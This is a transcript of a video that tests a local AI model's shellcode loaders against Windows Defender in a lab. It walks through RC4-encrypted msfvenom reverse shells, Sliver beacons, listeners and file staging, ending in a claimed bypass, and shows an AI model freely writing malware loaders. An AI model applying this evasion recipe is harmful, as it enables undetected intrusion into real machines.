Outflank recently dropped 7 billion parameters model that you can run local on your system and which is capable of generating Windows shellcode loaders or aka shellcode runners. Now in that video we are running this model locally on our 3090 machine and we are comparing and testing this model to see if it can successfully bypass Windows Defender. So stick until the end to find out if we managed to bypass it. You have timestamps down in the video, so if you need, navigate yourself in the sections you need the most, and let's start. Now, this model, as mentioned, is a local model, which means that we can host this model locally, and it depends on the GPU in order to be efficient and effective. So if you have low requirement or low hardware system, I think it's not going to work well because at the end it has 7 billion parameters and the model itself is several gigabytes. I think it was around 4. So ideally, the bigger the hardware, the better. I think the model requires at least 24 gigs of VRAM. I'm not sure. I'm not exactly sure how much it was. Maybe if we do VRAM here. Yeah, 24 gigs of VRAM. That's the whole point. So we need to have a stable GPU for that. But again, the plus of the entire thing is that the model is local only on your system. Now, Outflank recommends to set up the model via VLLM. Now, I'm not using VLLM because this is a Linux environment, as far as I'm aware. Maybe guys point me in the comments if I'm wrong, but as far as I see it, it's a Linux environment. And my 3090 system is a Windows environment. I did not want to install Ubuntu just for the sake of testing the model. So that's why I decided to run it with something else. And that something else is essentially the Ollama server. What you can do is, of course, you can have multiple ways of how you can actually run the model. Outflank recommend that you run the model with VLLM, but at the end you can run it, I think, again, as efficient with the Ollama server. Now the command is quite simple. What you can do is just, if you don't have it installed on your system, you can do winget install and then Ollama server. This is going to install the binary itself, and the next time you restart the PowerShell session, you're going to have it running. See if you have it running. All we can do is, I can stop the model for now. Just you can run Ollama server. And if you see this help menu and so on, if you see the model, because I have the model already downloaded, then it means that you have the model, or you can do -H. See all the options for that. Now, when you have the Ollama server, what you can do is actually pull up or download the model that's being used. In that case, the model is called Dante 7 billion, and I think GGUF is the entirely local model. So if you see their documentation, or actually here, sorry, you have the GGUF model, which essentially is the local model that you run using your VRAM. I'm not exactly sure what's the difference between GGUF and the main one. So, for example, what's the difference between this and that? That's not the GGUF, but as far as I'm aware, this has some kind of access to the internet, whereas that runs local only on your GPU and everything's embedded inside. So that's how I think. I'm not that big of an AI guy, so if you guys think you can correct me about something, just feel free to do it in the comments, and so we can start. Now from here you can see the various models and the various sizes that you can pull up. So ideally speaking, the bigger the size in gigabytes, the better the model is going to be, because it's going to have, I can say, I don't know if the parameters is the right word, but it's going to be more capable because it's going to be bigger. It can think more. So by default, I was able to pull up the Q4KM. So if we go to the Q4KM, we have 4.8 gig model. So that's the default, the standard one. It's fast and it's recommended. But to be honest, guys, I did a little bit of tests on it and I don't think it's that useful. I can give you some examples. So when you go here and I can start my server there, so I can run it. Then I can open a new chat. There it is. And I can simply say something like hi. Right off the bat, the AI starts to automatically generate some kind of a shellcode loader, and it's doing all this thinking in front of you, so you can see exactly what it's doing, what is the whole process, what he's going to figure out. But to me, that's extremely chaotic because now I did not specify any context. I did not specify if I want the payload to be staged. I did not specify about encryption. Maybe it's gonna do it, maybe not. I did not specify if the payload is already encrypted and what key we have. So it's just gonna start to figure out something, and it's gonna start to pick up a language and directly go overwriting the payload itself. So also what you can see is that the code is actually a little bit broken. So you can see that we have some kind of a structure of code. Here we have some kind of decoded shellcode, which to me the structure doesn't look alright because here we again have some kind of a code, which is not inside the code box. So this makes the thing, I can say, bad, because from the UI perspective, you need to manually scrape and figure out the place of the code and assemble it manually, which is a high chance of making mistakes around something. At least it's quite common. So that's one thing I don't like, and that's why I wanted to try the bigger models. So in my machine, I have a lot of space. Sorry. So if we go to the Explorer itself, I can go to this PC. And you can see on the disk drive, I have around 100 gigs of space. So I think running the model should be good to go. So what we can do is essentially I can remove this model, and then I want to pull. I'm gonna go for PO8. That's gonna be fast and best quality. So see how that goes. I'm gonna run it now. I'm gonna wait for the entire model to be downloaded and finished. And I'm gonna, guys, resume so we can jump right there and compare the current status of the model with the one from Q8. So let's see how that plays out. It's running on localhost now. Let's see now if it's a little bit more responsive. So first, I want to see if I have some chat history from the previous one. It looks like it's not the case. I can do, for example, hi. And again, I don't see the responsiveness of that. So I want to stop the chat. I want to go with a new one, and I can directly engage with the model, saying, let's do write me shellcode loader in C. Run that. Let's tackle that. Now we give him concrete task. And I'm curious how he's gonna do it. So I think the third process is gonna be big. But the thing I don't like is the scattered code we have. Yeah, so now the model finished, and I can say that the final result is not better. Because at least if you run it locally on Windows, that at least for me the entire process is not stable and is not convenient. Because now, yep, we have Python. Maybe this part is the encryption of the payload itself. Looks to me like that. We have some compilation instructions. Yep, you do. And then you have the rest of the code which looks scattered and just bad. Some of the code is inside a text box. Some of the code is pasted directly, and you need to manually assemble the stuff. Now, let me try something else and give it a little bit more tests to see if we can get better results. So what we can do here is let's probe something else and do things like generate shellcode loader in C#. So let's give it some time now. Let it walk through the entire thought process, and let's see what's gonna happen at the end. Okay, now the entire process is completed, and on the first glance, it was not that slow, by the way. On the first glance, when you go there, it seems fine. So we have the setup.py, which is doing the encryption of the shellcode itself, and it gives you how to run it. You specify the file, you get the output header, and this outputs the file inside as the .h, which you then import to your C. And yes, I asked for C#, but it decided to give me C instead. And then when that's done, you have the C code, which looks nice. It has the structure. But if you take a look at the C code, it's doing anti-debugging, it's doing direct pointer shellcode execution. That's all fine and good. you have exported function, which in that case is Excel auto open, and then that's it. So I'm skeptical that this is gonna work. After all, yeah, it might actually, I'm not quite sure, but at least it looks better. So when I asked for C#, I don't know why it gave me C. Maybe C is pre-coded inside the ML itself. Maybe the agent only knows how to do it on C and no other language. But when I say to give me a C# version, it actually make a nice job of segmenting the entire code in a code box, so you can for sure copy and paste the entire thing. So what we're gonna do now is actually copy the entire code, migrate to our VM, and let's analyze what happens under the hood and what kind of quality code did this ML generate. And more importantly, is that enough to bypass the vendor? Let's see. I'm quickly pausing the video just to say massive thanks to all of my Patreon supporters. Thank you so much for sticking by. Thank you so much for making this possible. If you also have deeper appreciation, make sure to become a Patreon and access internal tools, documentation, and know-how. I'm sure you can find it handy. Moving on. Okay, now we're ready, and since the code is C-based and it's going to be compiled for Windows, I decided to debug it from a Windows system. Of course, you can cross-compile, use Linux, and then essentially make the cross-compilation, that's for sure, but for me, using Windows is much more convenient. So here we can type the project name, let's give it something like test ML. Why not? Simple as that. Let's now create the projects and let's copy the files by each one by one. Now here I'm gonna first rename the thing to C because that's what we're gonna be building. And by the way, I made a mistake, so we need to restart the entire process. Why? Because the code from the ML is for DLL and I created an exe project. So when you create a new project, you go to console app, and then on the console app you need to find where it was a DLL, dynamic link library. Let me see if that's the correct one. Yeah, that should be it. So with that, I'll go with next. DLL ML test. Why not? Create that. And here we have the main logic for our DLL. Now the first is the precompile header. We're gonna leave that, it's not gonna do any harm. So here, let's go now to the model itself and start with the main.c because that's the body of our shellcode loader, and it's quite important to actually know what it does and to see what kind of code did it iterate. Alright, now here we have several things. We have the windows.h. We have also include encrypted shellcode.h, which we still do not have, but we're gonna build with the Python that the ML gave us. Now the first thing we have is the RC4 decrypt, which is nice because we're using some kind of encryption in the packet itself, or in the shellcode itself, so that is a plus to me. But what I can say is that one thing that I observed while playing with the ML is that it rotates the type of encryption it does. Sometimes it did RC4, sometimes it did AES, and sometimes XOR. But the name themselves, I don't think they're not okay, and there can be more obfuscation there to the data. But that's another topic, because yes, after you're done with the payload, then you can obfuscate with another AI, so that's not a problem. So let's just leave it be. Now, as mentioned, the first thing is the RC4 decryption. We're going to make the encryption from Python itself. Then from here we have isDebugged, which is going to run isDebugger present API, which tries to find if the current process is being debugged, but at the end this API is extremely well known and some vendors might flag just because of its presence. So yes, the idea is good, but I don't think it uses in that case the most convenient way of actually showing if the process is being debugged. Because yes, the idea is correct, but as mentioned, this function is super detectable and it's not a good idea to actually embed it inside your payload. Then we have the shellcode thread, which what it does essentially is a direct pointer. So it's nothing else beside direct pointer, which by design is fine. I mean, you cannot, in my opinion, execute or run a payload more evasive than the direct pointer. To me, it's much more evasive than spawning the threads. It's much more evasive than spawning the process, because at the end what you do is you just get the execution pointer of the program and you paste it where the shellcode starts in memory. And that's, I think, one of the most evasive ways of how you can actually execute the payload. Much more evasive than starting the process. So that's nothing wrong with that, and I agree with the option of going for the direct pointer. And now here, what we have is the DLL export function. Now what that means is when we generate DLL, this DLL cannot be executed like a normal binary from double clicking, but instead we need to run it with, for example, run DLL32, and we need to specify a specific function. Now by default, this function is called myDLL_main or DLL_main, but if you export it like that, you can export and run specifically that function. That's why it's being exported, because now it's accessible, it's not internal, and can be used. So by design, I also like that, because when you generate DLL, it's bad to have everything inside your DLL main, because in this way you can cause waterlock, and if you go for the C2 payloads, most of the times they're gonna break. So that's why it's much more better and much more efficient if we go for the DLL export function, and that's why I also agree with DML. Now here we have the first thing we do after we export and run the function is essentially the isDebug presence. So yeah, we already discussed that. Then if the process is not debugged, we have also some comments, which is nice. We decrypt the payload. We create the memory for it. We check if the memory is there. We copy the payload inside the memory. We decrypt it. There it is. And essentially change the memory protections for it. I don't understand what that does, to be honest. We open a new thread. Which I'm not sure what was that, to be honest. I don't know. So let me take a closer look into the code, see actually what happens. So first, let's see where that's being used. Okay, so we create thread pointing to that function, which is going to do direct pointer. I think that that's not effective, because at the end, we are creating a thread, and in that thread, we are doing the direct pointer. So I don't think that's the best implementation for direct pointer, just because that's the idea of it, to evade creating new threads and to evade creating new processes. And now in that case, I think that the first part of the code is 100% correct, but the second part, the thread creation, is not that correct and not that in place, because as mentioned, that's not the most convenient way to use the direct pointer execution. But yeah, I think the payload itself is fine and it's gonna work. So we're gonna shoot it for a demo and see how it goes. In a nutshell, I like most of the code. For example, we define the memory. We essentially free the memory after we know that now it's inside the memory itself. We decrypt it before execution, before memory copy into it, like that, which is also fine. We also free the variable here, and we also run it with direct pointer. Yeah, so the code looks good to me. I think that can be enough to bypass Defender. I'm not sure how it's going to play out with the staging, because we are not staging, we are embedding the payload as a header file. So I'm not sure if Defender is not going to be complaining about that, but at the end it's going to be encrypted with high entropy, but it's not an EDR, it's Defender. So I'm curious to see if that's going to work out and how it's going to play out. So let me quickly generate a Sliver C2 beacon, make sure to encrypt it with the payload, with the code from the ML itself, and then come back, compile, and see how it goes. So what we're doing now is I'm going to spawn Visual Studio Code process here, and we're going to essentially copy, it's so bad, it's so big, sorry, and we're going to copy the Python side from the ML here. So let's call that setup.py, just like that. Now here I'm gonna paste the code itself, and the code, I think, is very simple. So what it does is it has one function, RC4 crypt, which is doing the manual RC4 encryption using Python. And now from there, all we have to do is simply run setup.py, shellcode file, and the output header file. So I believe the shellcode file is supposed to be inside a bin. I think so. Yeah, a bit binary. It's a raw shellcode file, and it's supposed to give us back a header file with the encrypted payload inside. Now here is the key that is going to be used during encryption, so we must ensure that the same key is going to be used over decryption in order to properly do it. Alright, so how to do it? We can test it with maybe Sliver, so let's do it with that. I can do sudo service Sliver status. I'm gonna start it. And now here we can do Sliver. Starting that is gonna run Sliver inside my current working directory, so that should be completely fine. Now here we can do jobs, just to see if we can have any listeners. No, so for that I can do http -h -lhost 192.168.0.206 -l port. Let's make it 80 if it's not occupied. No, it's not. So with that we can do 80. I can also make the screen bigger for you guys. Do we need to specify something else? No, I don't think so. So run that. And now if we do jobs, now we can see that we have the listener ready and working. Then what we can do is type generate beacons, generate beacon -h. Now here, if my memory is not mistaken, we can do -b, and that's for, yeah, there it is, HTTP. And now here we do HTTP 192.168.0.206.80. Format is gonna be, I believe, shellcode. Yeah, format is gonna be, yeah, shellcode. Run that. And I think that's enough. I don't want to specify any Sliver evasive options to not mess up with the entire payload itself. Here we're trying to see if that's gonna work and not to make it the most evasive, right? Because if we do a version on the Sliver C2, that can mess up the payload. Sometimes I've had problems before with Sliver. To be honest, I'm not exactly sure if that's gonna work. If not, we can try maybe from Metasploit just to see if it's gonna work. But let's see how it goes. Now we'll see the desktop, ML test. There is the payload. And now what we can do is Python 3, yummy tugbo.bin, and let's go with the same name that it's expected, which is encrypted shellcode.h. Or let's call that tugbo. Alright, so it complains about the shellcode. That's the thing I mentioned to you guys, that Sliver shellcodes are different. So what we can do is generate a very, very simple netcat reverse shell, the most easy and simple shellcode. So let's do MSFVenom -p Windows 64 shell reverse TCP lhost eth0 port 4444. Format's gonna be raw. Output's gonna be shell.bin. And now let me try the same thing with shell.bin. And yeah, again, we have the problem with the payload generation itself. Yeah, so let me think how to get over this process. Maybe what we can do is to not rely on the encryption part itself, but actually what we can do is directly encrypt the payload itself from the MSFVenom. So there it is. We can specify the payload. In that case, it's Windows x64 shell reverse TCP. --encrypt is going to be RC4, and then --encrypt key is going to be a secret key in that case. And then let's call that payload.bin. So output that. And also what I think we can do is to not output it as a bin file, but we can directly output that as a header file. So for example, since we have that, we can xxd it and actually port it to a header file. So let's see if that's gonna work. So if I do that, xxd -c payload.bin, and then I output that into beacon.h, Now if we do vim beacon.h, you can see that indeed you now have a header file with the payload itself. There it is. So if I scroll down, we have the total size, which is 460, and we have the entire thing inside the H file. Perfect. Now we have the encrypted payload as an H file, and now we can store that inside our command loop. So what we can do is cat beacon.h, and I want to excel-ib to copy that to my clipboard. Go there, go to my Visual Studio, which is class view. I don't want the class view. I want the solution explorer. Go to headers and then add new item. Then call that clipboard.h. Like that. Add and paste the entire thing there. Okay, perfect. Now let's get back to the main file inside the source and then the main.cpp. There it is. Now it's resolved. And what we can do is to now convert the encrypted shellcode, because that's a variable inside the header file, into, if we go here, payload bin. So I can go with that, and I want to place that with payload bin everywhere. So in theory now, that should be compiled. In theory, that should be compiled. So if I run that, and also, by the way, we needed to include one more library, which in that case was stdlib.h. And when you include that stdlib.h, you can now include things like 3, because it was every now before that. And yeah, we have compilation, guys. That works. Now, one thing I want to see is the secret. Yeah, the key is there. So I think we should be fine. Now, the first thing is, of course, to check if that works in the first place. Not if that bypasses Defender, but if it's functional. So that's one thing I can give you as advice. To always check if your payload worked first before diving deep into evasion. Because if it doesn't work, you can spend hours trying to evade it, something that's not functional. Now, here, since the payload is MSFVenom, what I can do is simply host ncmvop4444, run that. And now, in theory, I should be able to do run dll32.exe, specify my dll test, and now specify the exported function, which is that one there. Run that. Okay. And nothing happens. Missing entry, Excel auto open. Okay, after a little bit of Googling, I found out that the issue was right in front of our eyes. We were missing extern C, and that's why it was not it was failing to actually find the function. Now, the moment of truth comes, so what I can do now is simply clear up. I can run DLL32, my DLL, and the Excel auto open function, which is exactly this one there. So I can run it. You see that now we don't have the pop-up issue, but at the end we again do not have the payload. So with that, I can conclude that I enjoy the idea of having a local LLM which is trained for that, but I don't think this was optimal in terms of UI useness and code quality. But we are not giving up, guys. So what I decided to do is to run the model as a different setup, because in the past we did LLM serve, but now I did Ollama pool, and I pulled the 8 gigabyte model. So I already have it. So what I can do is simply run Ollama run and specify the model, and now we can do something like high. Now what I observed is that sometimes high breaks the model, yep, and it starts to become inside a giant loop which never ends, but sometimes it works. So what we can do is, can you generate a shellcode loader in C? I'd be happy to do it, assuming that's in a controlled environment, and there it is, we have the code. So for me, it looks much better than the previous example. We don't have scattered codes, we don't have explanations and thought process in between the code, and it looks better. Now, what does the code do? Is here we have the Windows libraries, we have the shellcode itself, we have virtual alloc to allocate memory, mem commit, mem reserve, page execute, read write. Then we have mem copy and then direct pointer. Now, that's perfect because just by looking at the code, I can assure you guys that this thing works because that's the most simple shellcode loader that just works. You have the shellcode, you write it into memory, you allocate memory, you write it into memory, and you execute it via direct pointer. Now, we are getting somewhere. And let's start to now play around with the AI to see how good we can be and can we actually evade Defender. Now, what I can do is I can copy the entire thing and I like this shellcode runner. I can paste it here. But now it does not evade Defender. Because I'm sure Defender is going to catch it 100%. Can you add RC4 encryption? This is how I generate my payload. So here we can go back. Then here we can just simply copy that. Go back to the LLM and paste it. So let's see what it's going to do now. To make the shellcode loader more robust against the video, we need to incorporate obfuscation, RC4 encryption is good starting point. Yeah, let's see. Alright, so we have the RC encrypted payload, which looks legit. So it's time to test it. So what I can do is simply copy that, go back to my command here, and now make a new project because we don't need it anymore. So now we're going to start with the exe process, not the it's not a DLL, so it's console app, ML test, and that. Now make sure to rename the file to C, like that, and paste it. Alright, perfect. We don't have any syntax errors, which is good. What we need to do now is to make sure we have the proper shellcode there. So what we can do is simply do the same command as before. But in that case, it's not going to be raw, but it's going to be C. And that's going to be payload.c. So run that. I'm going to cat payload.c, excel -ib to copy it to my clipboard, get back here, and simply paste it like that. Now just make sure I use the proper name, and I don't need this one there. Perfect. Now, in theory, this should work. So we can test it. I'm going to go to releases tab. I can go to build, and inside the build, we can now simply navigate to the folder and try to run it now. Let me set up my listener, NCMVOP 4444, and simply run ML test, get back, and it works. We've wasted a little bit of time of trying to figure out how to make it stable with the LLM server, but with Ollama, it just worked right off the bat. So it turns out that it's really important on how you run your LLM. And when the advisor says that it must be run that specific way, well, maybe follow them. Right, now we have a stable shell. That's perfect. Now let me try to push that a little bit further. I can go back, and here simply we can do, I like this code, works good, but now can you stage the payload? Actually, yeah, that's stage the payload over how to do it. Maybe file staging, HTTP staging. Maybe let's go with file staging over the file system inside a file called config.dat. So I am expected that the dropper shall retrieve the encrypted shellcode from config.dat and then perform the rest of the logic. No more hard-coded shellcodes inside the file. From that, I can also paste the final payload because it mentions specifically what I want. And now, doing exactly that, instead of just simply using the hard-coded variable inside, it now reads it from the file system. So with that, I think we are good to go. Like that. So I can copy. I can paste my command VM like that. Yes, I can remove the C above. I can also remove that. Now let me look inside the code. Yep, we do file open config.dat. We open that as a binary file. And essentially what we do is we retrieve the file size and we also retrieve the data itself. So there it is. Read, and here we read the payload itself with the data, which is also more smarter, because now you don't need to manually specify the size of, or you don't need to manually specify a variable containing the size of the payload, but now it can be fetched and retrieved dynamically using this method. So what we can do now is compile again. We have some issues for the using insecure functions like fprintf or str error. In that case, what you can do simply is go to your project, right click and properties, then go to C and C++, there it is. And inside the general, you have the SDL checks, and here you can turn that to no. So apply, okay, and then simply compile. There it is. It works now. But now one last thing we need to do is to have the payload as config.dat file. So what we can do here is simply do move, or actually generate one new. Let's see, that was payload.bin. Yeah, so move payload.bin as config.dat. Here I can host my listener. Here I can host Python 3, HTTP server 80. So I can download the file. Okay, 80. So occupied 8080. Again, occupied 8000. Okay, now here what I can do is IWR HTTP 192.168, the IP of my Kali 0.206, port 8000, use basic parsing, there it is. And now here what we can do is simply get the file. In that case, that's going to be config.dat, there it is. And we can output that into again config.dat. Perfect. Now we have the ML test, which is the dropper itself, and we also have the staged payload, which is config.dat. So in that case, I can simply run the listener again. I want to clear that to not make up any errors, not to waste space. And now, in theory, if we run ML test.txt, the payload doesn't run. So let me try generating a new one because maybe we messed up something there. So I can do format raw, output config.dat, that's going to be the encrypted part. So run it. Okay. Now, do I have widget? Get.txt. Yep, I do. So widget. Now, instead of doing that, maybe PowerShell is breaking something for the download. We can do widget.txt. But I need to start the Python server. And that, there it is. Okay. And now if I run ml test.txt, do we have the beacon? On that, there, and no beacon this time. So I'm quite sure that if we take a look at the source code, we can see that the rest of the code is supposed to be the same. So let me see if that's the case. So we have that, virtual alloc, and the shellcode, memcopy, rc4 crypt. Okay, direct pointer. I suspect that since the previous version was working, and this one is not, I suspect that we have a problem with the staging itself. So I'm sure it's because of the file size, because it's not getting +1, but what I want to do is I want to tell him something. Now, It's okay, but this code did not work. No beacon was present. Or actually, wait, I want to see one more thing before we do that. In the first code we have, the key was hard-coded. And the key was... where it is? Yeah, there it is. Unsigned char key. And now we don't have that. Yeah, there it is, key. And that key is equal to malloc keylen. And then we memcopy key. I don't understand what's going on here. So it's because of the key we cannot decrypt the payload. That's most likely why we cannot execute it. So we can go back and tell him the code does not work. Most likely because, or actually, so I think it's also a nice idea to try to force the ML to debug and try to fix out the code. Let's see how efficient it is in that. So we can do things like the code does not work. I have all the setup, the config.dat is there, encrypted, but after running the exe, there is no payload, no beacon. Shall I give him instructions and hints? Yeah, let me try it. Maybe take a look at the key. It was hard-coded before. Now it's fetched dynamically, which most likely fails. Let's give him some hints. I see the problem here is the code above. We are reading the encrypted shellcode and the key from config.dat. Where if config.dat connects, yeah. So it assumes that the key is also going to be there, but in that case it's not, because the key is the key and config.dat is the payload only. So if we should be able to see the key somewhere. Let me copy the code because it's making it much easier. So I can get it there, go to that commando, paste, and now try to find out the key, assign char shellcode, key. He's done the same mistake. I doubt this is gonna work. I really doubt this is gonna work. No chance. No chance. Because the key is not there. The key cannot be simply decrypted. Now, if we go again, the key is meeting. My key is. I can simply go here and paste. I was expecting that by giving him hints, he's gonna make the thing work. Can we fix the code by fixing the key itself? UFA? What's going on with that? Yeah, so we started to be dumb again. Yeah. So what we can try is simply manually do it. So we can go back, find the key. There it is. And what we can do is that's gonna be simply secret key. And on that, bow. Let's try again. And again, we don't have a beacon. So it's not the key. I'm gonna give it one more try. So what we can do is paste the code that we know it works. So in that case, this is the one before the staging. And we can verify it works by having the shell. And now this is also done by RC4 encryption. And now what I want to test is to provide a specific instructions to the ML so it knows what exactly to do. So let me try that. This code works, but instead of having hard-coded variable with shellcode inside, I want you to read the shellcode from the file system and from a file called config.dat. Do not change anything else. just read the shellcode from config.dat and dynamically find its size. I think that's enough, so run that. Okay, now we have the RC4 implementation again. We have the main, we have create file windows API. Okay, and now let's see what kind of code we have. So let me copy that from Ollama, paste it to my command do. Let's see the code. Now that's the encryption part, that's perfect. Now we have the key, which is now looks better. And then we have the length of the key, which is okay. We call create file A with generic read, which is the file. Then we get the file size. We allocate memory with the length of the file size, which is correct. Then the encrypted shellcode is gonna be malloc. I don't quite understand that. Malloc shellcode length, so we allocate more memory. All right. And then we read the file there. Yeah, okay, so exactly the same thing as before, as previous example. Okay. The rest is all fine. So let me try to run that. Yeah, it's been running now, so I can close it. So it looks good to me on the first eye. It looks good to me, so I can compile. We can host up the Netcat listener again. Run it. The shell hangs. Then we have the beacon. So it turns out that it's extremely important to tell the AI what exactly you want to do. And that gives me to the end point of my video, and that is how to actually work with the AI and why the human is still needed in the entire interaction. Because what we can do is, in the previous example, I told DML, just do staging. Do staging with the local file and read it as config.dat. Now, that's fine, but I did not explain what staging is, and most likely it was not 100% aware of what I was trying to say. So we tried to think and create its own conclusion based on what staging might be, and then it ended up having broken code and trying to exfiltrate key from the payload itself, which was stupid. In that case, what I did is simply I told him, again, it worked, but instead of having this hard-coded variable, I want you to read the shellcode from the file system and the file to be config.dat. So in that case, I gave the ML a specific instructions on which to operate. It was not do staging, but it was, instead of having this hard-coded, actually do it this way. So I think this is the best way of how to actually work with AI, because the more precise and good instructions you give them, the better chance you're gonna have to get what you actually need. So there's one key principle here. The computer does what you tell him to do, not what you think you told him to do. And that was quite important one. Now comes the final part. What we can do now is to boot up our Windows Defender system, and from there try to see if we can actually bypass Defender with the code that we now have. So we're gonna do a test on my Windows 11 system, which again have Defender turned on. So let me verify it's on, by the way. Yeah, there it is. Yeah, it's okay. It's all good. So what we can do now is simply run the ML test, get back, and we have a beacon. So yes, officially the mission from the video is accomplished. I can say as a summary of that video that you went through a lot of content, so I appreciate you for staying by. And I want to say big thanks to Outflank for giving us the blog post about the model itself and how you can train your own model yourself using GPUs and so on. So highly appreciate that work, and also appreciate the model they provide. Now again, it's important on how you run the model, because in the first part you were running the model with Ollama server, and it felt miserably bad. then we run with Ollama, and it was much better. And again, it's important to know the AI, how to speak with it, and what kind of instructions to give them. If you give the AI raw instructions on what to do exactly on what specific way, yes, it can be efficient, but specifically for these kind of models, which are, I can say, local and more dumping quotes, I don't think the more they think, the worse the output they're going to provide. So, in my opinion, if you're going to use local models, try to not give them the option to think, but just say, I want you to do that on that specific way with that specific thing. So that's how we were able to bypass Defender. I want you to say massive thanks for sticking by. And again, massive thanks for the Outflank, for the model, and for the documentation. I really appreciate that work. So in the future, I expect local LLMs to be just better and better and to get better and better. So we are going into the phase where we're going to be using them much more. So I think that's a nice start to the things. And I mean, it's cool to have local, the ethical model in quotes that can have payloads. Yeah. Thanks for sticking by. Mission accomplished. And I'm gonna see you in the next one. If you have some video ideas, drop them in the comments, and also subscribing to the channel or liking the video always help. Thank you so much, and see you until the next one.